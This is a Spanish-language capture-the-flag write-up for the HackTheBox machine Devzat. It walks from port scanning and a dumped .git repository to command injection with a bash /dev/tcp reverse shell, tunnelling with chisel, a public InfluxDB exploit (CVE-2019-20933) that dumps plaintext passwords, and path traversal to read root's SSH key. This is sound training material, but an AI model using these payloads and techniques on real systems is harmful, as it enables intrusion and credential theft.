Devzat es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Devzat 10.10.11.118 a /etc/hosts como devzat.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
# Nmap 7.92 scan initiated Wed Jan 12 08:02:12 2022 as: nmap -sV -sC -oA enumeration/nmap 10.10.11.118 Nmap scan report for 10.10.11.118 Host is up (0.047s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA) | 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA) |_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-title: Did not follow redirect to http://devzat.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) 8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go | ssh-hostkey: |_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8000-TCP:V=7.92%I=7%D=1/12%Time=61DE7CFD%P=x86_64-pc-linux-gnu%r(NU SF:LL,C,"SSH-2\.0-Go\r\n"); Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 12 08:02:53 2022 -- 1 IP address (1 host up) scanned in 41.71 seconds |
Revisamos los puertos existentes y vemos dos interesnates, el puerto 80 que pertenece a una página web y el puerto 8000 en el cual hay una aplicación de go mediante ssh.
Enumeración
Comenzamos la enumeración revisando el portal web a través de la url de devzat.htb
Revisamos la web y encontramos una cosa interesante casi al final de la misma, donde indica como conectarnos a un chat a través de ssh y el puerto 8000 visto anteriormente
Así que vamos a conectarnos al mismo
1 2 3 4 5 6 7 8 9 10 11 12 |
$ ssh -l devbot devzat.htb -p 8000 Nickname already in use, please choose a different one. > devzat Less than a minute earlier devbot: You seem to be new here hi. Welcome to Devzat! Run /help to see what you can do. devbot: hi has joined the chat hi: how are u devbot: hi has left the chat devbot: hi stayed on for 2 minutes Welcome to the chat. There are no more users devbot: devzat has joined the chat devzat: |
Vemos la ayuda del chat
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
devzat: /help [SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat [SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere. [SYSTEM] [SYSTEM] Interesting features: [SYSTEM] • Many, many commands. Run /commands. [SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room. [SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines. [SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example. [SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user. [SYSTEM] • Timezone support, use /tz Continent/City to set your timezone. [SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games. [SYSTEM] • Emoji replacements! (like on Slack and Discord) [SYSTEM] [SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php. [SYSTEM] [SYSTEM] Made by Ishan Goel with feature ideas from friends. [SYSTEM] Thanks to Caleb Denio for lending his server! [SYSTEM] [SYSTEM] For a list of commands run |
Y los comandos disponibles del mismo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
devzat: /commands [SYSTEM] Commands [SYSTEM] clear - Clears your terminal [SYSTEM] message - Sends a private message to someone [SYSTEM] users - Gets a list of the active users [SYSTEM] all - Gets a list of all users who has ever connected [SYSTEM] exit - Kicks you out of the chat incase your client was bugged [SYSTEM] bell - Toggles notifications when you get pinged [SYSTEM] room - Changes which room you are currently in [SYSTEM] id - Gets the hashed IP of the user [SYSTEM] commands - Get a list of commands [SYSTEM] nick - Change your display name [SYSTEM] color - Change your display name color [SYSTEM] timezone - Change how you view time [SYSTEM] emojis - Get a list of emojis you can use [SYSTEM] help - Get generic info about the server [SYSTEM] tictactoe - Play tictactoe [SYSTEM] hangman - Play hangman [SYSTEM] shrug - Drops a shrug emoji [SYSTEM] ascii-art - Bob ross with text [SYSTEM] example-code - Hello world! devzat: |
Después de revisar un rato el chat y las opciones disponibles, parece que no podemos hacer mucho más por ahora así que vamos a realizar una serie de enumeraciones y encontramos un dominio interesante al hacer la enumeración de virtualhosts
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://devzat.htb :: Wordlist : FUZZ: /home/asdf/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt :: Header : Host: FUZZ.devzat.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ pets [Status: 200, Size: 510, Words: 20, Lines: 21] :: Progress: [4997/4997] :: Job [1/1] :: 855 req/sec :: Duration: [0:00:09] :: Errors: 0 :: |
Descubrimos la url de pets.devzat.htb que se trata de un inventario de mascotas
No parece que haya mucho más por aqui así que enumeramos directorios con gobuster y encontramos uno en concreto que nos será de ayuda
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ gobuster dir -u http://pets.devzat.htb/ -w ~/github/SecLists/Discovery/Web-Content/raft-small-words.txt -t 150 -b 200,404 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://pets.devzat.htb/ [+] Method: GET [+] Threads: 150 [+] Wordlist: /home/asdf/github/SecLists/Discovery/Web-Content/raft-small-words.txt [+] Negative Status codes: 200,404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/01/12 08:21:24 Starting gobuster in directory enumeration mode =============================================================== /css (Status: 301) [Size: 40] [--> /css/] /build (Status: 301) [Size: 42] [--> /build/] /server-status (Status: 403) [Size: 280] /.git (Status: 301) [Size: 41] [--> /.git/] =============================================================== 2022/01/12 08:21:45 Finished =============================================================== |
Vemos que hay un directorio de git por lo que utilizaremos la tool de git-dumper para descargar su contenido
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
$ ~/github/git-dumper/git-dumper.py http://pets.devzat.htb/.git pets-git [-] Testing http://pets.devzat.htb/.git/HEAD [200] [-] Testing http://pets.devzat.htb/.git/ [200] [-] Fetching common files [-] Fetching http://pets.devzat.htb/.gitignore [200] [-] Fetching http://pets.devzat.htb/.git/description [200] [-] Fetching http://pets.devzat.htb/.git/hooks/applypatch-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/COMMIT_EDITMSG [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-push.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/post-commit.sample [404] [-] Fetching http://pets.devzat.htb/.git/hooks/post-receive.sample [404] [-] Fetching http://pets.devzat.htb/.git/hooks/commit-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-receive.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-rebase.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/post-update.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-commit.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-applypatch.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/prepare-commit-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/update.sample [200] [-] Fetching http://pets.devzat.htb/.git/objects/info/packs [404] [-] Fetching http://pets.devzat.htb/.git/index [200] [-] Fetching http://pets.devzat.htb/.git/info/exclude [200] [-] Finding refs/ [-] Fetching http://pets.devzat.htb/.git/FETCH_HEAD [404] [-] Fetching http://pets.devzat.htb/.git/HEAD [200] [-] Fetching http://pets.devzat.htb/.git/ORIG_HEAD [404] [-] Fetching http://pets.devzat.htb/.git/config [200] [-] Fetching http://pets.devzat.htb/.git/info/refs [404] [-] Fetching http://pets.devzat.htb/.git/logs/HEAD [200] [-] Fetching http://pets.devzat.htb/.git/logs/refs/heads/master [200] [-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/HEAD [404] [-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/master [404] [-] Fetching http://pets.devzat.htb/.git/packed-refs [404] [-] Fetching http://pets.devzat.htb/.git/logs/refs/stash [404] [-] Fetching http://pets.devzat.htb/.git/refs/heads/master [200] [-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/HEAD [404] [-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/master [404] [-] Fetching http://pets.devzat.htb/.git/refs/stash [404] [-] Fetching http://pets.devzat.htb/.git/refs/wip/wtree/refs/heads/master [404] [-] Fetching http://pets.devzat.htb/.git/refs/wip/index/refs/heads/master [404] [-] Finding packs [-] Finding objects [-] Fetching objects [-] Fetching http://pets.devzat.htb/.git/objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7e/58517e9052d2ce28d12c549dc6ad30423e4c15 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3c/6dd07ff39376f9d6f513b06167cc46b3a5af98 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bc/b397a0fe8794bf9f03b934812f1efee5533f34 [200] [-] Fetching http://pets.devzat.htb/.git/objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828 [200] [-] Fetching http://pets.devzat.htb/.git/objects/5b/2f2f4b425c4a753d5fb1bd01df5c2389dd95e0 [200] [-] Fetching http://pets.devzat.htb/.git/objects/da/93220bc34984be11385afbbe6cd044e7b455eb [200] [-] Fetching http://pets.devzat.htb/.git/objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705 [200] [-] Fetching http://pets.devzat.htb/.git/objects/69/f1153887d2790c94f23a00c6f85958cf198418 [200] [-] Fetching http://pets.devzat.htb/.git/objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57 [200] [-] Fetching http://pets.devzat.htb/.git/objects/47/7b607f55d0d610decf739027ad1cad7846e8a1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/59/b0e7c7cdc9f76c39eac534d56f2d92d1f995fe [200] [-] Fetching http://pets.devzat.htb/.git/objects/d1/ac9ba1169e4076832034c5585e1c5bf9d6f83c [200] [-] Fetching http://pets.devzat.htb/.git/objects/94/caeb6c465d2de18aa8cf364c56dd7515ea2a1a [200] [-] Fetching http://pets.devzat.htb/.git/objects/ae/444e098873c82b664e7e6204594e5db26126ff [200] [-] Fetching http://pets.devzat.htb/.git/objects/9d/f490e8cfdd75704d31f518caf76ab34494b124 [200] [-] Fetching http://pets.devzat.htb/.git/objects/03/cd4553f4c458eaef2f9734925b4e6e8c0d6df9 [200] [-] Fetching http://pets.devzat.htb/.git/objects/50/a0732c90552ff2e7ddd92d79fa964c0d9cd5eb [200] [-] Fetching http://pets.devzat.htb/.git/objects/b8/a8f656e1607a2c36884d3165872ef3515b5879 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7b/1ba8363499e091996af78355e71d504b220312 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bb/28a9414d456a3e71bc1ffca30e95b98f6dc2f1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/e9/f54b13d5e925602e04501415ced4bc0bc881d2 [200] [-] Fetching http://pets.devzat.htb/.git/objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62 [200] [-] Fetching http://pets.devzat.htb/.git/objects/dc/52d954d8d7f62c82cf63236d27093764a3d046 [200] [-] Fetching http://pets.devzat.htb/.git/objects/73/c1a4d5d156b6ddc62a7e3eba1c206bd6ad19c8 [200] [-] Fetching http://pets.devzat.htb/.git/objects/9d/ba8c340bf81622be7b48a7a3546869bfb851d4 [200] [-] Fetching http://pets.devzat.htb/.git/objects/fc/567cd2f11d83683d9eb4ca1a5fdc912f7d417c [200] [-] Fetching http://pets.devzat.htb/.git/objects/d0/5ea581fbbf17eb0d3139f9937ac6a8fde98685 [200] [-] Fetching http://pets.devzat.htb/.git/objects/54/f95a54c49178dd5d496058e4ee99829748c49a [200] [-] Fetching http://pets.devzat.htb/.git/objects/fa/e180dacc52937c1d6a24636431663d6754fef5 [200] [-] Fetching http://pets.devzat.htb/.git/objects/b0/00a57acd3e3027fac564a394704a66c824b76d [200] [-] Fetching http://pets.devzat.htb/.git/objects/00/00000000000000000000000000000000000000 [404] [-] Fetching http://pets.devzat.htb/.git/objects/a4/04baa1852e12d51e5941285100091e9380bb03 [200] [-] Fetching http://pets.devzat.htb/.git/objects/82/74d7a547c0c3854c074579dfc359664082a8f6 [200] [-] Fetching http://pets.devzat.htb/.git/objects/1b/ac702fbb64129fc77d16b3e0c6652cf2ebc852 [200] [-] Fetching http://pets.devzat.htb/.git/objects/46/24e1f42ce009c31dba5a7c05df4c74472bd5be [200] [-] Fetching http://pets.devzat.htb/.git/objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07 [200] [-] Fetching http://pets.devzat.htb/.git/objects/8d/a69971e32e6e08cae489b40731845d1de13258 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813 [200] [-] Fetching http://pets.devzat.htb/.git/objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d5/84aafd3a034f1f93b4c2cfa285a77798965c2d [200] [-] Fetching http://pets.devzat.htb/.git/objects/af/e315244f6dae3beda0159693d25a6e0466dd90 [200] [-] Fetching http://pets.devzat.htb/.git/objects/6f/3c2fa527470bae3ce951717b431c2fe5c38332 [200] [-] Fetching http://pets.devzat.htb/.git/objects/1d/69311c0a33ed5f21e8384641b310cc24e5701c [200] [-] Fetching http://pets.devzat.htb/.git/objects/db/70e73e473f8ed16d596ab0fd373f3423fc8512 [200] [-] Fetching http://pets.devzat.htb/.git/objects/68/27c53e0d5e2f69f9fa7eb4f5b4b05ee429f539 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bd/7e818ef2c4c78fe5f61a0285df390aa3fa0e43 [200] [-] Fetching http://pets.devzat.htb/.git/objects/f3/3e8162997aaa9da582aa81428ee87aa48953a6 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d5/eee74298e64b35d51a1ded2a482ae9cbbfd3c1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7c/8dc57a3e2266715fac1ccdb4d677982154c16d [200] [-] Fetching http://pets.devzat.htb/.git/objects/17/b8e146f96cd4cd6bd9d5a9215ade0e8cad656e [200] [-] Fetching http://pets.devzat.htb/.git/objects/5d/cebd6a2a7127228bf4330ae18b78785942ec19 [200] [-] Fetching http://pets.devzat.htb/.git/objects/4e/48a46697302eb89d858229ec12ad23edd9b259 [200] [-] Fetching http://pets.devzat.htb/.git/objects/dc/e459d0e5a832b08688e2331557535d60d8a171 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3e/967e5015bbcd3460dd43f8acc05b3125eac4cd [200] [-] Fetching http://pets.devzat.htb/.git/objects/47/a0383d182b9413440099ee04c25954e08494e8 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d9/2ef698d7cbc3c1014a125e4dcd53be770d5beb [200] [-] Fetching http://pets.devzat.htb/.git/objects/28/a51e070175ab78da05529ff059367df9df3e57 [200] [-] Running git checkout . |
Revisamos el código existente y observamos que cuando carga la especie, ejecuta el comando sin aplicar ninguna validación ni saneamiento sobre la misma, por lo que puede ser un punto de entrada
1 2 3 4 5 6 7 8 |
func loadCharacter(species string) string { cmd := exec.Command("sh", "-c", "cat characteristics/"+species) stdoutStderr, err := cmd.CombinedOutput() if err != nil { return err.Error() } return string(stdoutStderr) } |
Dicho esto interceptaremos la petición de creación de mascota con burp suite y editaremos el valor del campo species por nuestra rev shell que será la siguiente
1 |
bash -i >& /dev/tcp/IP/PORT 0>&1 |
La codificamos en base 64 y la enviaremos a través de burp
Y obtendremos una shell con el usuario patrick en nuestra escucha
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.2] from devzat.htb [10.10.11.118] 38912 bash: cannot set terminal process group (822): Inappropriate ioctl for device bash: no job control in this shell patrick@devzat:~/pets$ id id uid=1000(patrick) gid=1000(patrick) groups=1000(patrick) patrick@devzat:~/pets$ |
Ya estamos dentro, pero este usuario no es capaz de obtener la flag así que vamos a enumerar el sistema en detalle y encontramos un proceso muy interesante
1 2 |
patrick@devzat:~$ ps aux|grep docker| grep -v grep|grep proxy root 1253 0.0 0.1 549312 3888 ? Sl 07:02 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086 |
En la máquina existe un contendor con el cual redirecciona el puerto 8086 de local al mismo, así que vamos a ver que hay aqui.
Para ello necesitaremos abrir un tunel entre nuestra máquina y la víctima y para ello utilizaremos chisel.
Así que vamos a ello, en primer lugar necesitaremos levantar el servidor
1 2 3 4 |
$ chisel server -p 8000 --reverse 2022/01/12 09:13:42 server: Reverse tunnelling enabled 2022/01/12 09:13:42 server: Fingerprint 73p8CtOWHKemanx5sjWhIx6yTBWl5lYJ3GU3cYHi03Y= 2022/01/12 09:13:42 server: Listening on http://0.0.0.0:8000 |
Posteriormente levantamos el cliente que se conectará a nuestro servidor
1 2 3 |
patrick@devzat:/tmp$ ./chisel_1.7.6_linux_amd64 client 10.10.14.2:8000 R:8086 2022/01/12 08:40:20 client: Connecting to ws://10.10.14.2:8000 2022/01/12 08:40:21 client: Connected (Latency 60.55383ms) |
Y veremos como tenemos la escucha y el puerto 8086 de la máquina devzat redireccionado al 8086 local
1 2 3 4 5 6 |
$ chisel server -p 8000 --reverse 2022/01/12 09:32:28 server: Reverse tunnelling enabled 2022/01/12 09:32:28 server: Fingerprint UkgTUpewy1KFU02O0qg/aR5rd/kBTX14sI3Fgk/RFtY= 2022/01/12 09:32:28 server: Listening on http://0.0.0.0:8000 2022/01/12 09:32:28 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src) 2022/01/12 09:35:07 server: session#2: tun: proxy#R:8086=>8086: Listening |
Así que vamos a utilizar nmap para descubrir que hay en ese puerto
1 2 3 4 5 6 7 8 9 |
# Nmap 7.92 scan initiated Wed Jan 12 09:36:31 2022 as: nmap -p 8086 -sV -oA enumeration/nmap_2 127.0.0.1 Nmap scan report for localhost (127.0.0.1) Host is up (0.00014s latency). PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 12 09:36:38 2022 -- 1 IP address (1 host up) scanned in 7.19 seconds |
Descubrimos que se trata de un InfluxDB y además sabemos también su versión 1.7.5 por lo que vamos a google y encontramos la vulnerabilidad CVE-2019-20933 y un exploit público para su explotación
Así que lo ejecutamos
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
$ python3 __main__.py _____ __ _ _____ ____ ______ _ _ _ |_ _| / _| | | __ \| _ \ | ____| | | (_) | | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| | | |_| CVE-2019-20933 Insert ip host (default localhost): Insert port (default 8086): Insert influxdb user (wordlist path to bruteforce username): /home/asdf/github/SecLists/Usernames/Names/names.txt Start username bruteforce [x] aaliyah [x] aaren [x] aarika [x] aaron [x] aartjan [x] aarushi [x] abagael [x] abagail [x] abahri [x] abbas [x] abbe [x] abbey [x] abbi [x] abbie [x] abby [x] abbye [x] abdalla [x] abdallah [x] abdul [x] abdullah [x] abe [x] abel [x] abi [x] abia [x] abigael [x] abigail [x] abigale [x] abra [x] abraham [x] abram [x] abree [x] abrianna [x] abriel [x] abrielle [x] abu [x] aby [x] acacia [x] access [x] accounting [x] ace [x] achal [x] achamma [x] action [x] ada [x] adah [x] adair [x] adalia [x] adaline [x] adalyn [x] adam [x] adan [x] adara [x] adda [x] addi [x] addia [x] addie [x] addilyn [x] addison [x] addons [x] addy [x] ade [x] adel [x] adela [x] adelaida [x] adelaide [x] adele [x] adelene [x] adelheid [x] adelia [x] adelice [x] adelina [x] adelind [x] adeline [x] adella [x] adelle [x] adelynn [x] aden [x] adena [x] adeniyi [x] adey [x] adi [x] adiana [x] adie [x] adina [x] aditya [v] admin Host vulnerable !!! Databases list: 1) devzat 2) _internal Insert database name (exit to close): |
Y bingo!, vamos a revisar que tablas existen en el esquema devzat
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
[devzat] Insert query (exit to change db): show measurements { "results": [ { "series": [ { "columns": [ "name" ], "name": "measurements", "values": [ [ "user" ] ] } ], "statement_id": 0 } ] } |
Y vamos a sacar los datos de la tabla user
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
[devzat] Insert query (exit to change db): select * from "user" { "results": [ { "series": [ { "columns": [ "time", "enabled", "password", "username" ], "name": "user", "values": [ [ "2021-06-22T20:04:16.313965493Z", false, "WillyWonka2021", "wilhelm" ], [ "2021-06-22T20:04:16.320782034Z", true, "woBeeYareedahc7Oogeephies7Aiseci", "catherine" ], [ "2021-06-22T20:04:16.996682002Z", true, "RoyalQueenBee$", "charles" ] ] } ], "statement_id": 0 } ] } |
Y tenemos una password.
Obteniendo la flag de user
Utilizamos la password obtenida para escalar privilegios y conseguir la primera flag
1 2 3 4 5 6 7 |
patrick@devzat:~$ su - catherine Password: catherine@devzat:~$ ls -l total 4 -r-------- 1 catherine catherine 33 Jan 12 07:02 user.txt catherine@devzat:~$ cat user.txt 4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf |
Escalado de privilegios
Bueno llegados a este punto, vamos a enumerar otra vez la máquina a ver que descubrimos ahora y encontramos dos backups muy suculentos
1 2 3 4 5 6 7 8 9 |
catherine@devzat:/var/backups$ ll total 140 drwxr-xr-x 2 root root 4096 Sep 29 16:25 ./ drwxr-xr-x 14 root root 4096 Jun 22 2021 ../ -rw-r--r-- 1 root root 59142 Sep 28 18:45 apt.extended_states.0 -rw-r--r-- 1 root root 6588 Sep 21 20:17 apt.extended_states.1.gz -rw-r--r-- 1 root root 6602 Jul 16 06:41 apt.extended_states.2.gz -rw------- 1 catherine catherine 28297 Jul 16 07:00 devzat-dev.zip -rw------- 1 catherine catherine 27567 Jul 16 07:00 devzat-main.zip |
Uno corresponde al entorno de desarrollo y el otro al entorno principal al que nos conectamos anteriormente, así que nos descargamos los mismos y revisamos las diferencias entre ambos entornos, en concreto, y después de un rato buscando, del fichero commands.go
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
$ diff main/commands.go dev/commands.go 3a4 > "bufio" 4a6,7 > "os" > "path/filepath" 36a40 > file = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil} 38c42,101 < commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} > } > > func fileCommand(u *user, args []string) { > if len(args) < 1 { > u.system("Please provide file to print and the password") > return > } > > if len(args) < 2 { > u.system("You need to provide the correct password to use this function") > return > } > > path := args[0] > pass := args[1] > > // Check my secure password > if pass != "CeilingCatStillAThingIn2021?" { > u.system("You did provide the wrong password") > return > } > > // Get CWD > cwd, err := os.Getwd() > if err != nil { > u.system(err.Error()) > } > > // Construct path to print > printPath := filepath.Join(cwd, path) > > // Check if file exists > if _, err := os.Stat(printPath); err == nil { > // exists, print > file, err := os.Open(printPath) > if err != nil { > u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error())) > return > } > defer file.Close() > > scanner := bufio.NewScanner(file) > for scanner.Scan() { > u.system(scanner.Text()) > } > > if err := scanner.Err(); err != nil { > u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error())) > } > > return > > } else if os.IsNotExist(err) { > // does not exist, print error > u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath)) > return > } > // bokred? > u.system("Something went badly wrong.") |
Y vemos que hay una diferencia entre ambos entornos, y es que en dev hay un comando que no pasó a main
1 2 3 |
< commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} |
Además el puerto del entorno de dev es diferente
1 2 |
$ cat devchat.go |grep "port =" port = 8443 |
Así que vamos a conectarnos y a probar el mismo
1 2 3 4 5 6 7 8 9 |
catherine@devzat:/var/backups$ ssh -l test localhost -p 8443 The authenticity of host '[localhost]:8443 ([127.0.0.1]:8443)' can't be established. ED25519 key fingerprint is SHA256:liAkhV56PrAa5ORjJC5MU4YSl8kfNXp+QuljetKw0XU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[localhost]:8443' (ED25519) to the list of known hosts. Welcome to the chat. There are no more users devbot: test has joined the chat test: /file [SYSTEM] Please provide file to print and the password |
Parece que podemos obtener cualquier fichero del servidor así que vamos a tratar de obtener la key ssh del usuario root
1 2 3 4 5 6 7 8 9 |
test: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021? [SYSTEM] -----BEGIN OPENSSH PRIVATE KEY----- [SYSTEM] b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW [SYSTEM] ...... [SYSTEM] ...... [SYSTEM] ...... [SYSTEM] ..... [SYSTEM] -----END OPENSSH PRIVATE KEY----- test: |
Y Bingo! la tenemos, aunque obviamente no vamos a ponerla aquí también.
Obteniendo la flag de root
Ahora que ya tenemos la key de root la utilizaremos para acceder por ssh y obtener la flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
$ ssh -i keys/root.pem root@devzat.htb Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed 12 Jan 2022 09:10:41 AM UTC System load: 0.8 Processes: 245 Usage of /: 60.0% of 7.81GB Users logged in: 1 Memory usage: 40% IPv4 address for docker0: 172.17.0.1 Swap usage: 0% IPv4 address for eth0: 10.10.11.118 107 updates can be applied immediately. 33 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Oct 11 14:28:01 2021 root@devzat:~# ls -l total 12 drwxr-x--- 2 root root 4096 Jul 16 06:56 devzat drwxr-xr-x 3 root root 4096 Jun 22 2021 go -r-------- 1 root root 33 Jan 12 07:02 root.txt root@devzat:~# cat root.txt 9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx6 root@devzat:~# |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace